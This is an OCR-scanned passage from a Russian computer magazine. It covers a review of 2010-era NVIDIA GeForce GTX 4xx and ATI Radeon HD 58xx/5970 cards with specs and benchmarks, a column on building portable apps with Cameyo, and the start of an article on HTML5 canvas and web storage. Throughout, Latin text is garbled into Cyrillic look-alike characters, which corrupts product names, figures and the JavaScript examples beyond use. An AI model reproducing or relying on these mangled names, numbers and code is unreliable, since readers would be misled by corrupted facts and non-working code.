остаются голубой мечтой для большинства геймеров. Но некоторые, 
собрав волю в кулак, все же отдают за них огромные деньги, 
устанавливают такого монстра себе в ПК и пару лет не задумываются 
о производительности графической подсистемы. 



Методика тестирования 

Для того, чтобы понять, за что же мы выкладываем такие средства, мы 
разработали специальную тестовую методику. Сначала это были синте- 
тическиетесты ЗОМагк2003 и Неаѵеп Огадоп (с поддержкой ОігесіХ 1 1 , 
кстати). Разрешение составляло 1920x1 080 точек, качество изображения 
— максимальное, а также четырехкратное сглаживание. Вторую группу 
тестовых программ составляли реальные игры (разрешение во всех 
также составляло 1920x1 080 точек. Это Резісіепі Еѵіі 5 и 5.Т.А.І_.К.Е.Р.: Зов 
Припяти, в которых были выставлены максимальные настройки графики, 
но в РЕ5 антиалиасингбыл восьмикратным, а в Зоне — четырехкратным. 
В играх ОагкѴоісІ, Ваіппап: АгкЬат Азуіит и Зігееі РідЬЕег IV режимы ААи 
АР незадействовались. 

Технологии 

Скажем пару слов о Еегті, на архитектуре которой построены новейшие 
платы ІЧѴЮІА, участвующие в нашем сегодняшнем тесте. Например, у 
самого продвинутого чипа ІЧѴЮІА СеЕогсе СТХ480 частота СРІЭ составля- 
ет700 МГц, шейдерного блока — 1401 МГц, а памяти — от924 (3696) МГц. 
Шина ОЗУ, кстати, довольно широкая — 384 бита. А вотс чем у кали- 



форнийцев вэтотраз не оченьхорошо получилось, такэто с энергопот- 
реблением платы. Уже одното, что производитель считает допустимым 
максимальный нагрев в 105 градусов Цельсия, говорито многом. Аточнее 
— отом, что еслитвой блокпитания имеетмощность меньшую, чем 600 Вт, 
то тебе либо нужно его менять, либо отказываться оттакой платы. Иначе 
работы не будет. Несколько иная ситуация у ІЧѴЮІА СеЕогсе 6ТХ470. 
Температура тут несколько снижена за счет отключения одного потоково- 
го мультипроцессора, а также частот работы памяти, ядра и шейдерного 
блока. Шина памяти также была несколько урезана — до 320 бит. Еще 
больше она похудела у ІЧѴЮІА СеЕогсе СТХ465 — инженеры сделали ее 
256-битной. Естественно, порезаны были и частоты работы. В общем и 
целом, ІЧѴЮІА сделала все, чтобы ее продукты были представлены в раз- 
ных сегментах Ні-Епб-диапазона, и этоу нее неплохо получилось. Выбор, 
как всегда, остается за тобой. Мы же можем только подробно рассказать 
тебе о протестированных нами платах, представить результаты бенчмар- 
ков, а также напомнить, что пока у изделий АТІ нет поддержки технологии 
РЬузХ, но, судя по результатам тестов, работают карты из «красной семьи» 
несколько быстрее своих калифорнийских «друзей». 



► 020 
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НІ5 Расіеоп НО 5850 
іСооІег V 

Технические характеристики: 

ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТА ЯДРА, М ГЦ: 725 
ЧАСТОТА ПАМЯТИ, МГЦ: 1000 (4000) 

ОБЪЕМ ПАМЯТИ, МБ: 1024 
ШИНА ПАМЯТИ, БИТ:25б 
ТИП ПАМЯТИ: 600Р5 
ВЕРСИЯ БІКЕСТХ: 11 

■■■■■■■■□□ 

+ 

Сразу скажем, что производительность данной видеоплаты заслуживает 
только самых лестных оценок. Причем какотдельно.таки всравнении с 
конкурентами на других чипсетах (не важно, от каких производителей]. 
Соотношение цены и качества у нее очень привлекательное. А теперь 
разберемся, откуда же все это берется. Построено устройство на графи- 
ческом процессоре АТІ Расіеоп НО 5850, причем все частоты оставлены 
без изменений (725 МГц у чипа и 1000 МГц у памяти]. Правда, в драйверах 
АТІ каждый может произвести разгон самостоятельно. Его потенци- 
ал очень неплох, учитываято, что кулер на плате не референсный, а 
фирменный, переработанный, состоящий из медныхтепловыхтрубок 
и алюминиевых ребер-радиаторов. Горячий воздух выбрасывается за 
пределы корпуса с помощью небольшого вентилятора. В итоге конструк- 
ция работаеттихо и эффективно. 

Еслиты не ярый фанат компании ІМѴЮІА, который не может принципи- 
ально даже слышать об иных видеоадаптерах, то ты вряд ли сможешь 
найти какие-либо существенные недостатки у НІ5 Расіеоп НО 5850 
іСооІегѴ. 



НІ5 Расіеоп НО 5870 
ІСооІег V ТигЬо X 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ:40 
ЧАСТОТА ЯД РА, М ГЦ: 900 
ЧАСТОТА ПАМЯТИ, МГЦ: 1225 (4900) 

ОБЪЕМ ПАМЯТИ, МБ: 1024 
ШИНА ПАМЯТИ, БИТ:25б 
ТИП ПАМЯТИ: 600Р5 
ВЕРСИЯ йІРЕСТХ: 11 

■■■■■■■■■□ 

+ 

Плата, построенная на чуть более мощном наборе микросхем, неже- 
ли предыдущее решение от НІ5. Говоря простым языком, в нем всего 
больше: транзисторов (2,1 5 миллиарда), потоковых процессоров (1600) 
и текстурных блоков (80). Крометого, инженеры и разработчики решили 
избавить тебя от необходимости совершать какие-то дополнительные 
действия и самостоятельно разогнали плату на 50 МГц как по чипу, таки 
по памяти. Впрочем, наличие хорошего (эффективно и тихо работающего 
кулера] даеттебе возможность продолжить эксперименты с оверклокин- 
гом. Результаты нашихтестов показали, что со скоростью работы у НІ5 
Расіеоп НО 5870 іСооІегѴТигбоХ все не просто в порядке, а отлично. Сво- 
им одноклассникам, произведенным инженерами из Калифорнии, она не 
только не уступает, но где-то даже и превосходит их. Да и оттоповой НІ5 
Расіеоп НО 5970 отстает ненамного, заставляя задуматься отом, чтобы 
практически безболезненно сэкономить на разнице в цене между ними. 

Графические адаптеры высшего ценового диапазона — этооченька- 
чественные и продуманные устройства. Весьма часто у них нет крупных 
объективных недостатков, и это именно тот случай. Конечно, можно 
пожаловаться на высокую цену, отсутствие аналога ІМѴЮІА РЬузХ и так 
далее... но надо ли? 
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НІ5 Расіеоп 
НО 5970 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТАЯДРА, МГЦ: 725 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 000 (4000) 

ОБЪЕМ ПАМЯТИ, МБ: 2X1 024 
ШИНА ПАМЯТИ, БИТ: 2X256 
ТИП ПАМЯТИ: ОООР5 
ВЕРСИЯ БІВЕСТХ: 1 1 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТАЯДРА, МГЦ: 607 
ЧАСТОТА ПАМЯТИ, МГЦ: 837 (3348) 

ОБЪЕМ ПАМЯТИ, МБ: 1280 
ШИНА ПАМЯТИ, БИТ:320 
ТИП ПАМЯТИ: ОООР5 
ВЕРСИЯ БІВЕСТХ: 1 1 



□ □ 



+ 

Несмотря на то, что эта плата обладает полностью референсным дизай- 
ном (то есть кулеру неетоже обычный) и стандартными частотами ядра и 
памяти, ее возможности очень высоки. Все дело втом, что на ней распо- 
ложено огромное количество видеопамяти, а также два самых мощных 
на сегодняшний день графических процессора отАТІ. Понятное дело, 
что гигантскую производительность тут не затмит никакой дизайн. А что 
до частот, то никто не мешаеттебе поднять их самостоятельно. Стоит ли 
говорить, что во всех наш их тестах эта плата стала победительницей, что, 
в итоге, и принесло ей награду «Выбор редакции». Ауж если парутаких 
включить в режиме СгоззРіге... 

Правда, стоимость та кого решения составит совершенно нереальную 
сумму. Да и процессортебе явно придется поменять, потому что ЦП как 
для одной, так и для двух таких плат нужен очень мощный, иначе толку от 
них никакого не будет. Возможно, понадобится поменять и корпус вместе 
с блоком питания — мощным устройствам нужно много места, много 
воздуха и много электроэнергии. 



+ 

Признайся честно — когда ты смотришь характеристики видеоплат, 
то в ряд л и обращаещь внимание на ширину шины памяти? А если и 
обращаешь, то послетого, каквзглянешь на модель графического 
процессора, объем памяти и другие подобные вещи. Оказывается, зря ты 
так поступаешь, отшины зависиточень многое. Например, у этой платы 
320-битная шина ОЗУ, что дало производителю возможность поместить 
на борт 1280 Мб видеопамяти ОООР5 и выжать из нее максимум того, на 
что она способна. В практической плоскости это означает, что в совре- 
менных играх, поражающихтебя красотой картинки (то есть, во многом, 
объемными текстурами, анизотропией и разнымитам фильтрациями), 
тормозов никаких не будет. Что и доказал наш ОігесіХ 1 1 -ориентирован- 
ныйтестНеаѵеп Огадоп. 

Недостатки у платы тоже есть. Во-первых, это очень большой нагрев — 
порой температура чипа достигала 90 градусов. Так что пылесось корпус, 
упорядочивай провода и ставь дополнительные вентиляторы, ведь и 
другие устройства могут перенятьу ІппоЗй (ЗеРогсе 6ТХ470 еежар. Кроме 
того, кулер платы издаеточень сильный шум. 



► 022 
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ІппоЗО іСЫИ ВІаск 5егіе$ 
ОеРогсе СТХ 480 



ІппоЗО ОеРогсе 
6ТХ 470 НАѴѴК 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ТЕХПРОЦЕСС, НМ: 40 
ЧАСТОТА ЯДРА, МГЦ: 630 
ЧАСТОТА ПАМЯТИ, МГЦ: 873 (3492) 
ОБЪЕМ ПАМЯТИ, МБ: 1280 
ШИНА ПАМЯТИ, БИТ:320 
ТИП ПАМЯТИ: Ѳ00В5 
ВЕРСИЯ БІВЕСТХ: 1 1 



□ □ 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТЕХПРОЦЕСС, НМ :40 
ЧАСТОТА ЯДРА, МГЦ: 720 
ЧАСТОТА ПАМЯТИ, МГЦ: 930 ( 3720 ) 

ОБЪЕМ ПАМЯТИ, МБ: 1536 
ШИНА ПАМЯТИ, БИТ:384 
ТИП ПАМЯТИ: 600Р5 
ВЕРСИЯ ОІРЕСТХ: 11 



□ 



Несмотря на то, что эту плату создала та же компания, она имеет отнюдь 
не референсный кулер — уж тут-то инженерам дали порезвиться вдо- 
воль. Теперьустройство охлаждения представляет собой четыре медные 
трубки, алюминиевые ребра и целыхтри вентилятора, которые отгоняют 
отэтого поставщика ГР5 горячий воздух. Результат налицо — выше 68 
градусов температура не поднималась! Но для создания платы стаким 
громким названием этого показалось мало, и эти маньяки еще и разо- 
гнали ядро на 23 МГц, память — на 36 МГц и шейдерный блок — на 45 МГц. 

Ксожалению, особого эффекта такой разгон не принес, что нагляд- 
но показывают результаты тестов, которые ненамного отличаются от 
результатов ІппоЗО (ЗеГогсе 6ТХ470. Изменение дизайна и содержания 
кулера увеличило общую длину платы на 26 см, так что будь аккуратен 
— этот девайс поместится далеко не в любой корпус. Громкость работы 
системы охлаждения никуда не делась. И не нужно забывать о том, что 
огромное количество пространства внизу платы будет недоступно для 
установки других устройств. 



+ 

Если очень постараться, то из видеоплаты можно сделать крайне 
интересный девайс. Видимо, именнотакой целью и задалась компания 
ІппоЗО, разрабатывая и выпуская ІппоЗО іСбіП ВІаскВегіез ВеГогсе 
6ТХ 480. Основное отличие этого графического адаптера от большинства 
собратьев заключается в применении жидкостной системы охлаждения. 
Собрав ее и проведя нашетестирование, мы с удовольствием обнару- 
жили, что выше 65 градусов температура платы не поднималась, какбы 
мы над ней не издевались. Производительность платы находится на 
достаточно высоком уровне, а места она занимаетнетакужи много. 

Нужно помнить, что собратьустройство водяного охлаждения — это не 
такая уж простая задача. Так что будь готов проявить все свои техни- 
ческие таланты. Да и приобрести заранее резервуар, помпу и прочие 
приспособлениятакже совсем не помешает. 



Выводы 

Все-таки тестировать мощные графические платы высшего ценового 
диапазона — это очень приятная задача. Они лишены различных«де- 
тских» болезней, и в работе с ними можно сосредоточиться на ключевых 



вещах — качестве и производительности. Ксожалению, далеко не каж- 
дый геймер сможет приобрести себетакое чудо ввиду его немалой цены, 
но тот, кто это сделает, не прогадает. Титул «Выбор редакции» сегодня 
получает НІ5 Вабеоп НО 5970 за беспрецедентную производительность, 
а звание «Лучшей покупки» достается ІппоЗО (ЗеГогсе (ЗТХ 470. Т 
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РЕВВІІМ 



ЗОЛЛагкОЗ, баллы 



Неаѵеп Ргадоп, РР5 



НІЗ НО 5850 іСооІегѴ 
НІ5 НО 5870 іСооІегѴТигЬо X 
НІЗ НО 5970 

ІппоЗР СеРогсе СТХ 470 

ІппоЗО СеРогсе 6ТХ 470 НАМ 

ІппоЗй іСИіИ Віаск Зегіег 
СеРогсе 6ТХ 480 




НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴТигЬо X 
НІЗ НО 5970 

ІппоЗО СеРогсе СТХ470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО іСЬіІ± Віаск Зегіез 
СеРогсе СТХ 480 




Данный тест очень наглядно показывает скорости работы За ОігесІХ 11 — ближайшее будущее, и очень важно, как плата 

видеоплат работает с подобным приложением 



5+гее+ РідЫег IV, РР5 



НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴТигЬо X 
НІЗ НО 5970 

ІппоЗО СеРогсе СТХ 470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО іСЬіІІ Віаск Зегіез 
СеРогсе СТХ 480 




5.Т.А.І..К.Е.Р.: Зов Припяти, РР5 



НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴТигЬо X 
НІЗ НО 5970 

ІппоЗО СеРогсе СТХ 470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО іСЬіИ Віаск Зегіез 
СеРогсе СТХ 480 





О 10 20 30 40 50 (0 70 80 



Есть подозрения, что данная игра изначально Игра не нова, и наши участники отлично с ней справились 

оптимизирована только под архитектуру карт АН Касіеоп 



Оагк ѴоісІ, РР5 



Резісіепі ЕѵіІ 5, РР5 



НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴ ТигЬоХ 
НІЗ НО 5870 

ІппоЗО СеРогсе СТХ 470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО Віаск Зегіез 
СеРогсе СТХ 480 




НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴ ТигЬо X 
НІЗ НО 5870 

ІппоЗО СеРогсе СТХ 470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО Віаск Зегіез 
СеРогсе СТХ 480 




Тандем из АН и НІ5 снова в лидерах 



Почему-то эта игра никак не восприняла второй графический 
процессор платы НІБ РасІеоп НО 5970 



Ваітап: Агкпат Азуіит, РР5 



НІЗ НО 5850 ІСооІегѴ 
НІЗ НО 5870 ІСооІегѴТигЬо X 
НІЗ НО 5870 

ІппоЗО СеРогсе СТХ 470 

ІппоЗО СеРогсе СТХ 470 НАМ 

ІппоЗО Віаск Зегіез 
СеРогсе СТХ 480 




Самая дорогая плата - почти всегда самая мощная 



► 024 
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■ ■ Степан «51ер» Ильин ІѵѵіІІег.сот/зІераЬ 



Колонка редактора 

Создаем РогІаЫе-версию любого приложения 



В одном из уже давнишних номеров ][ у нас 
была статья «РогІаЫе — вот она, радость», 
где мы рассказывали, как из практически 
любой программы можно сделать портируе- 
мую версию, которая будет запускаться без 
установки, записать ее на флешку и всегда 
носить с собой. В ход тогда была пущена 
дорогостоящая утилита ТЫпзІаІІ. Позже этот 
проект был куплен компанией ѴМѵѵаге, и 
весь его функционал сейчас представлен в 
приложении ѴМѵѵаге ТЫпАрр. Как и другие 
продукты этой компании, ТЫпАрр занимается 
виртуализацией, а точнее — виртуализацией 
приложений. Задача такой операции в том, 
чтобы создать виртуальное окружение для 
отдельно взятого приложения. Это приложе- 
ние не должно подозревать о том, что запу- 
щено на другом компьютере; оно может, как и 
задумано разработчиками, обращаться к рее- 
стру, файловой системе и находить там ключи 
и файлы, которые были добавлены во время 
процедуры установки. Файлы приложения 
и все необходимые данные помещаются в 
единственный исполняемый .ЕХЕ-файл. Во 
время его запуска в системе развертывается 
виртуальное окружение, которое эмулирует 
нужные ключи реестра, ОСІЕки, библиотеки 
сторонних разработчиков, всевозможные 
фреймворки, а приложение запускается 
как ни в чем не бывало. При этом никакие 
драйвера в систему не устанавливаются, в 
реестр изменения не вносятся — приложе- 
ние полностью работает внутри виртуального 
окружения. Хороший подход, и ТЫпАрр 
отлично его реализует, но одна загвоздка — 
решение стоит как минимум $6050. Не кисло, 
да? Впрочем, аппетит компании, возможно, 
в скором времени утихнет, потому как в Сети 
недавно появилось реальная альтернатива 
для виртуализации приложений. Программа 
Сатеуо ( ѵѵѵѵѵѵ.сатеѵо.сот ) делает ровно то 
же самое, что и ТЫпАрр, с одной лишь раз- 
ницей — ничего за это не просит. И знаешь, 
на месте ѴМѵѵаге я бы начинал бояться. 
Сложно представить, как можно сделать 
процесс портирования еще проще, чем это 
реализовано в Сатеуо. После установки из 
1,5 Мб дистрибутива пользователю предлага- 
ется интерфейс с двумя кнопками: одна для 
создания нового контейнера, а другая — для 
модификации ранее созданных пакетов. Если 
нажать на первую («Саріиге іпзіаііабоп») 
программа начнет делать слепок (зпарзбоі:) 



системы, сохраняя для себя состояние 
файловой системы и реестра — от этой 
информации ей придется отталкиваться. Как 
только зпарзбоі будет сделан, Сатеуо пред- 
ложит приступить к установке приложения, 
для которого необходимо сделать РогІаЫе- 
версию. Пусть это будет Орега, а для полноты 
картины — еще и Еіазб-плеер для нее, а 
также баѵа-плагин. Тут никаких заморочек, 
просто устанавливаем все, как обычно; если 
требуется перезагрузка — смело ребутимся 
(это корректно обрабатывается). Как только 
установка и настройка закончены, можно 
нажимать на кнопку «Іпзіаіі бопе». В этот 
момент Сатеуо еще раз сделает слепок 
системы, чтобы сравнить, какие изменения 
произошли, и на основе этих данных соз- 
дать РогІаЫе-пакет. Процесс может занять 
несколько минут, после чего программа 
обрадует сообщением «Раскаде зиссеззМІу 
сгеаіеб». 

Вот, собственно, и все. Получившийся 
ЕХЕ’шник можно попробовать запустить на 
любой ѴѴіпбоѵѵз-системе и убедиться, что и 
сам браузер, и все дополнительно установ- 
ленные плагины работают. Можно записы- 
вать на флешку и без каких-либо проблем 
использовать на любом компьютере. Правда, 
есть один нюанс — в контейнер помеща- 
ется довольно много различных данных, 
поэтому вес пакета может быть довольно 
внушительным. Например, получившийся у 
меня пакет с Орега 10.62 весит аж 139 Мб. 

Но тут есть секрет: если изучить содержимое 
контейнера, легко обнаружить в нем файлы, 
которые Сатеуо поместил в него по ошибке, 
и на самом деле никакой необходимости в 
их виртуализации нет. Скажем, в мой пакет 
с Орега попал файл с индексом ОгорЬох’а, 
который весит почти 15 Мб, а ведь это деся- 
тая часть всего объема получившегося паке- 
та. Посмотреть, что находится внутри кон- 
тейнера, и внести изменения можно через 
Сатеуо, кликнув по второй (и последней) 
доступной кнопке «Ебіі ехізбпд раскаде». На 
вкладках «Еііез» и «Редізігу» легко увидеть, 
какие файлы и ветки реестра эмулируются. 
При необходимости любой элемент можно 
удалить или наоборот, что-то добавить. 
Интересная опция доступна на самой пер- 
вой вкладке «Оепегаі» — это Ізоіабоп Мобе. 
По умолчанию любое РогІаЫе- приложение 
работает полностью изолированно и не 



может вносить изменения в систему. Однако 
при необходимости режим пакета можно 
изменить на «Еиіі Ассезз», и тогда у програм- 
мы появится полноценный доступ к файлам и 
реестру, как и у любого другого приложения. 
Помимо самого Сатеуо, на сайте разработ- 
чика есть 5йК для разработчика. С помощью 
простого АРІ вполне реально автоматизи- 
ровать процесс, полностью заточить его под 
свои нужды. С помощью простых функций 
легко получить список файлов внутри пакета, 
работать с ключами реестра, которые редак- 
тируются, и т.д. Короче говоря, все в твоих 
руках, пс 
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Создать РогіаЫе-приложение 
с помощью Сотеуо проще простого 
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Создание образа системы перед 
установкой приложения 




Когда приложение установится, 
жмем на кнопку ІпзГаІІ боне 




Ковыряемся в созданном пакете 
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Ню нам даст новый стандарт? 




о Уже сейчас в вебе можно разрабатывать приложения, которые 
успешно выполняются в рамках браузера. Каждый день появляются 
все новые и новые технологии, которые, наконец, позволят нам из 
пресловутых веб-страничек сделать мощные инструменты, по 
возможностям ничуть не уступающие десктопным программам. 
Многие из этих новшеств разрабатываются в рамках стандарта НТМІ.5. 



ИНТЕРНЕТ УСТАРЕЛ, И ОБ ЭТОМ ВСЕ ЗНАЮТ! Сначала думали, что 
все обойдется, но когда в Сети появились толпы людей, которых 
не интересовали скучные технические отчеты и документация, это 
стало очевидно. Сеть требовала красоты и функциональности: изо- 
бражений, анимации, видео и аудио. Чтобы показать на странице 
все, что взбредет в голову дизайнера, напрягаться приходится и 
разработчикам браузеров, и составителям стандартов. Постепенно 
из обычного формата разметки текста НТМІ_ превращался в 
довольно сложный стандарт, на базе которого делали привычные 
нам страницы интернет-магазинов, банковские системы, онлайн- 
игры и порносайты. Но возможностей стандарта НТМІ_4 уже мало, 
а если уж говорить совсем на чистоту, то стандарт устарел уже в 
момент его создания. Первыми фишку потребностей народа про- 
секли в Масготесііа, давно купленной гигантом АбоЬе, которые 
выпустили сначала ЗЬоскѵѵаѵе, а потом и Ріазб. РІазЬ дал то, что 



всем так хотелось — видео, звук и анимацию, возможности про- 
граммировать графику и создавать более-менее реальные при- 
ложения. Для особо одаренных была реализована возможность 
объединить ЧаѵаЗсгірІ и РІазЬ (замечу, очень по-уродливому и 
ненадежно), таким образом дополняя упущения разработчиков 
браузера. Видео заполонило мир, ѴоиТиЬе, РасеЬоок и ВКонтакте 
стали самыми популярными сайтами. Во многом благодаря флешу, 
потому что без видео и приложений это были бы намного более 
унылые ресурсы. 

Упущенные возможности 

Но разработчики стандарта НТМІ_тоже поняли свое упущение и 
решили: надо дать народу новый стандарт, чтобы все делали свое 
дело, не уходя из обычной платформы браузера во всякие РІазЬ/ 
ЗіІѵегІідЫ/ПаѵаРХ. Дополнительный плагин для отображения стра- 
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Поддержка текстур, 30, управление клавиатурой и 
мышью — и все это в браузере при помощи магии 
сапѵаз 



ницы — это уже по определению плохо. Пользователям это нужно 
ставить, обновлять, мириться с дополнительными тормозами. А 
сам браузер из основного окна в мир Сети стал ненужной про- 
слойкой для запуска приложения на Еіазб’е или ЭіІѵегІідЫ’е. Сети 
срочно потребовался новый стандарт взамен устаревшего НТМІ_4. 
Его и придумали, незатейливо обозвав НТМІ_5. Это уже не только 
и не столько язык для разметки страниц и их форматирования, 
сколько руководство для разработчиков браузеров, какие возмож- 
ности они должны предоставлять странице и выполняемому там 
коду. При этом вторгаясь совсем не в область разметки, поручили 
браузеру дать невиданные возможности скриптам. Отныне работа с 
видео и звуком, 20 - и 30-графикой, анимацией, эффектами, сетью 
на низком уровне — все это должно быть доступным в обычном 
Эаѵа5сгі рі;. 

Основная задача нового стандарта — расширение стандарта раз- 
метки веб-страниц для того, чтобы создавать красивые и функцио- 
нальные сайты стало легче и проще. НТМІ_5 развивается в двух 
направлениях. Первое — это расширение языка НТМІ_для внедре- 
ния новых возможностей, которые раньше делались через грязные 
хаки и при помощи сплава С55 и ЗаѵаЗсгірС В основном это всякие 
визуальные штучки вроде скругленных уголков, элементы ввода 
(веб-формы) и прочие украшательства. Второе — добавление в 
веб новых возможностей с таким расчетом, чтобы веб-приложение 
имело все те же возможности, что и обычное десктопное при- 
ложение, при этом от пользователя требовался бы только браузер 
без всяких плагинов или дополнительных приблуд. Самый лучший 
этому пример — воспроизведение видео (привет, ѴоиТиЬе). Сейчас 
надо на ЗаѵаБсгірІ и Еіазб написать плеер, организовать далеко 
не тривиальную серверную часть, обеспечить все стандартные 
возможности (проигрывание, остановку, прогрессивную загрузку 
и т.п.). Морока еще та. НТМІ_5 тебе говорит, что это все не нужно 
— пусть браузер этим занимается, а ты просто вставь новый тег 
<ѵібео> и все. Элементы управления плеера, сам код и даже видео- 
кодек — все это стандартно и уже есть в браузере. Предлагаю игры 
с разметкой оставить неудачникам, которые стали верстальщика- 
ми, и познакомиться с теми новыми технологиями, которые появи- 
лись в НТМІ_5. 

В чем сила НТМІ.5, брат? 

Раньше веб-странички содержали или обычный текст, пусть и с 
форматированием, или же заранее подготовленные изображения 
в растровых форматах ЭРЕ О/ О I Р/ Р N Ѳ , изредка приправленные 
анимацией. Еіазб с его векторной природой и динамическим рисо- 
ванием сделал просто революцию — стало возможно генерировать 
анимацию прямо на лету, реагируя на действия пользователя, 
масштабировать ее и накладывать различные эффекты. Обычный 
НТМІ_ был лишен такого счастья и мог оперировать только сим- 
волами и объектами документа, но не отдельными графическими 
примитивами вроде линий или точек. Ну что ж, теперь это все в 




Тест на поддержку браузером фич НТМІ.5 



прошлом. Сапѵаз — это одна из самых ожидаемых и мощных воз- 
можностей в НТМІ_5. Как выглядит работа с графикой теперь? Ты 
просто создаешь специальный тег, внутри которого, в указанном 
прямоугольнике, имеешь возможность работать напрямую с пик- 
селями и графическими примитивами вроде фигур, линий, окруж- 
ностей и т.п. И все это доступно для управления программным спо- 
собом через ЭаѵаЗсгі рі;. Если ты пробовал программировать еще в 
ЭОЗ или интересовался, как делают игры, то должен представлять, 
какие чувства вызывает необходимость рисовать по пикселям и 
выводить каждую линию. Но раньше-то и этого не было. Если раз- 
работчики вовремя подсуетятся и выпустят развитые библиотеки 
для рисования, можно сказать, что Еіазб, наконец-то, обречен. 
Простейший пример использования сапѵаз: 

ІипсСіоп с!гам( ) { 

ѵаг сапѵаз = скэсшпепС . деСЕІетепЦВуІсі (" сапѵаз ") ; 

ІТ (сапѵаз . деССопСехС ) { 

ѵаг сСх = сапѵаз . деССопСехС (" 2с1" ) ; 

сСх. ІіІІЗСуІе = "гдЬ (200 , 0 , 0) " ; 

сСх . ІіІІКесС (10, 10, 55, 50); 

сСх . ІіІІЗСуІе = " гдЬа(0, 0, 200, 0.5)"; 

сСх . ІіІІКесС (30, 30, 55, 50); 

} 

} 

<Ьос1у оп1оасІ= " сігам ( ) ; " > 

ссапѵаз і <5= " сапѵаз " ѵісІЫзя " 15 0 " ЪеідЪ.Ц= " 15 0 " > 
</сапѵаз> 

</Ьос1у> 

Сапѵаз, конечно, не такой уж и новый или уникальный. Давно 
есть возможность рисовать, используя разные ухищрения вроде 
специального языка ѴМІ_ в браузерах от Місгозоіі или свободных 
форматов 5ѴѲ в Могіііа или Забагі. Но годится это разве что для 
рисования графиков, для которых не требуется много ресурсов. 
Сапѵаз — совсем другое дело. Производители браузеров заявили, 
что уже умеют оптимизировать такие операции, передавая их на 
графическую карту. Теперь браузер будет кушать не только память 
и процессор, но и ОРІІ. В последних версиях Соодіе Сбготе и ІЕ 
9ЬеІа для ускорения работы с графикой в элементе сапѵаз исполь- 
зуется аппаратная поддержка и ОігесіХАРІ. 

Что имеешь, не хранишь, 

загружая — плачёшь 

Если ты пробовал делать что-нибудь сложнее домашней странич- 
ки, наверняка сталкивался с ситуацией, когда на стороне клиента 
необходимо сохранить какую-то информацию, чтобы сто раз не 
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Множество онлайн тестов готовы показать, насколько 
поддерживаются все свойства НТЛЛ15 и С553 в твоем 
браузере. Как видишь, ІЕ позорно отстает 



гонять ее по сети с сервера. Раньше единственным вариантом 
было просто тупо загнать ее в баѵаБсгірІ-переменную, но она жила 
лишь то время, пока страница была открыта в браузере. Закрыл 
страницу — и все безвозвратно исчезало. Если клиент возвра- 
тился на сайт, то все приходилось загружать сначала, даже если 
ничего не изменилось. Соокіез с задачей хранения данных не 
справлялись, и единственное, что могли предложить — хранение 
идентификатора, который тебе приходилось уже привязывать на 
сервере к данным пользователя. Да и много ли можно сохранить 
в 4 Кб (а именно столько можно хранить в одной «печеньке»]? К 
тому же они посылаются на сервер с каждым НТТР-запросом, что 
непомерно раздувает сетевой трафик. 

Новая фишка — ѴѴеЬБіогаде или БОМ Зіогаде — призвана раз- 
грузить приложение, перенося часть данных на клиентскую сто- 
рону. Например, если у тебя есть онлайн-магазин, то данные о 
самых популярных товарах можно хранить сразу у клиента, лишь 
периодически его обновляя (и чем больше данных, тем заметнее 
выигрыш). Разработчики получают единый механизм доступа к 
данным, независимость хранилища от сайта, стойкость не только к 
закрытию вкладки или окна браузера, но и к полной перезагрузке 
компьютера. Сколько данных можно так хранить? По специфика- 
ции объем данных не ограничивается, но на деле ІЕ разрешает до 
10 Мб на домен, в Рі гебох чуть скромнее — до 5 Мб. Неожиданно, 
но в деле реализации спецификации хранилища МісгозоЛ реально 
впереди всех остальных браузеров, так как реализует не толь- 
ко рекомендованные спецификации, но и увеличивает лимиты, 
добавляет полезные свойства. Например, ІЕ8 — единственный, 
кто может сообщить, сколько же памяти реально занято данными, 
другие браузеры этого и близко не умеют. По спецификации хра- 
нилищ может быть два — зеззіоп, когда данные актуальные только 
для текущей вкладки (но при этом можно уходить на другие сайты, 
данные сохраняются), и Іосаі — уже настоящее постоянное храни- 
лище, привязанное к домену, где оно было создано (для поддоме- 
нов будут свои хранилища). 

Работать с хранилищами данных проще простого — это, по сути, 
модная нынче ІМоБОЕ (мы уже писали об такой архитектуре) база 
данных. Можно положить (зеі), получить (деі) и удалить (гетоѵе) 
значение переменной, данные при этом могут быть любыми, 
главное, чтобы это были строки или приводимые к ним форматы. 
Можно также удалить все (сіеаг) и узнать объем (ІепдіЬ) . Работа 
с хранилищем осуществляется также, как и с обычным хешем в 
баѵаБсгірІ:. Например, сохраним список друзей пользователя: 

міпсісж. ІосаІЗСогаде [ту:Егіепс1] = Ц8СЖ. зкгіпдіку ( 

[ {пате : "Вася" , етаіі : "ѵаз б аѲхакер . ги" } , {пате : "Аіех" , 
етаіі : "а1екз@хакер . ги" } ] ) ; 




Поддержка нового вида форм и элементов управле- 
ния. А ведь хотели сделать по-стандартному... вышло 
как всегда 



Как попробовать НТМІ.5? 



Не буду скрывать — НТМБ5 как стандарта еще нет, многие 
части его противоречивые и сырые. Производители браузеров 
думают по-разному, реализовывают то, что хотят, и как сами 
считают нужным. Мол, нет еще стандарта, поэтому сиди, юзер, 
молчи в тряпочку и жди, пока мы все сделаем! И ждать этого 
вашего НТМБ5 годами. Но если ты разработчик, или просто 
решил похвастаться, то вот тебе пара кратких рецептов, как 
добавить поддержку НТМБб-фич на свою страницу уже сейчас, 
не дожидаясь поддержки от браузера. Конечно, это все косты- 
ли — где-то эмулируется через Ріазб, где-то через сторонние 
библиотеки или С55, но зато уже сейчас и во всех браузерах. 
